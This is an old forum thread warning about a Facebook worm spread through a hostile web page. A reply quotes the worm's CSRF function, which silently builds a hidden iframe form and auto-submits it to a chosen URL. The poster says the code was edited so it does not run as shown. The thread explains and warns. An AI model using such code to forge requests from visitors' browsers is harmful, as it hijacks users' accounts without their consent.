Bitcoin Forum

Other => Off-topic => Topic started by: BCEmporium on July 03, 2011, 11:31:31 PM



Title: XSS / CSRF Facebook hostile-page
Post by: BCEmporium on July 03, 2011, 11:31:31 PM
For people who keep wondering about XSS and CSRF, here's an example of what they can do. This example is a new Facebook worm, which spreads by pointing users at this page: hxxp://greatlolfacehot.com/ (link replaced with hxxp). Make sure you have JavaScript disabled before you try it; then you can look at the source.

This is also a warning, just in case a friend of yours has posted some crap like this to his or your wall.


Title: Re: XSS / CSRF Facebook hostile-page
Post by: joepie91 on July 06, 2011, 05:16:49 PM
Sharing the part that does the CSRF here, for those who are interested...

Code:
function jacks(site,params){
  var div = document.createElement('div');
  div.innerHTML = '<iframe></iframe>';
  document.body.appendChild(div);
  var iframe = div.firstChild;
  var iframeDocument = iframe.documentHandler;
  iframeDocument.open();
  iframeDocument.close();
  var form = iframeDocument.createElement('form');
  iframeDocument.body.appendChild(form);
  form.setAttribute('action',site);
  for (param in params){
    var field = iframeDocument.createElement('input');
    field.setAttribute('type', 'hidden');
    field.setAttribute('name', param);
    field.setAttribute('value', params[param]);
    form.appendChild(field);
  }
  form.submit();
}
What this code roughly does is create an iframe with a form that is set to a specific Facebook sharing URL (which is also called by their on-site sharing functionality), insert a specific set of "parameters" (form fields) and corresponding values, and automatically submit the form. This is all done in the background, of course. The target URL and parameters can be specified in this function.

The code I posted here was edited so that it needs some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.